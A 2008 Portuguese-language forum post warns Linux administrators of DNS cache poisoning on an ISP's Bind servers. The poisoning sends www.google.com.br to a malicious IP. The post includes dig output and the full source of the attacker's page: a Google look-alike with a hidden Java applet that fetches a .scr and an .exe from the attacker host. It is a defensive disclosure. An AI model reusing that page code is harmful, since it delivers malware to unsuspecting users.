b30wu1f
(usa Debian)
Enviado em 08/10/2008 - 12:34h
Senhores
Gostaria de informar aos administradores que recebi um e-mail de um amigo, informando a exploração de uma vulnerabilidade conhecida do cache do Bind para redirecionar os usuários do site "
www.google.com.br" para um endereço fornecendo código malicioso. Ele informou o problema ao cert, como pode ser visto no e-mail abaixo, e o problema ainda persiste e pode ser testado por vocês.
Alertem seus usuários.
"Conforme falamos, o problema persiste hoje pela manhã, com os servidores ainda no ar e resolvendo para o servidor da vivax, conforme segue:
~$ date
Qua Out 8 11:08:51 BRT 2008
~$ dig @201.6.0.139
www.google.com.br
; <<>> DiG 9.4.2-P1 <<>> @201.6.0.139
www.google.com.br
; (1 server found)
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 48136
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;
www.google.com.br. IN A
;; ANSWER SECTION:
www.google.com.br. 5 IN A 201.75.18.168
;; Query time: 139 msec
;; SERVER: 201.6.0.139#53(201.6.0.139)
;; WHEN: Wed Oct 8 11:08:54 2008
;; MSG SIZE rcvd: 51
O código fonte do site malicioso é o seguinte:
<html>
<title>Google</title>
<body margin: 0>
<iframe frameborder='0' width='100%' height='100%' src='http://64.233.169.147' margin-left:0>
</iframe>
<div style="position: absolute; left: 0px; right: 0px; background;red ; visibility: hidden;">
<applet onerror="if(redir){redir=false;document.location='http://201.75.18.168/google/view.scr';}" name="google plugin searcher" code="Inicio.class" archive="http://www.google.com/searcher.jar" height='0' width='0'>
<param name='url' value="http://201.75.18.168/google/calc.exe">
</applet>
</div>
</html>
Note que ele abre a página oficial do google dentro de um iframe e chama o applet com o código malicioso no browser do usuário.
Os principais contatos de ABUSE (inclusive o Virtua) e o CERT foram notificados ontem a noite, por volta das 22h30.
Acho importante que os usuários sejam notificados o quanto antes.
Qualquer dúvida estou à disposição.
Abs.,
Wagner Hiendlmayer "
Jader Simões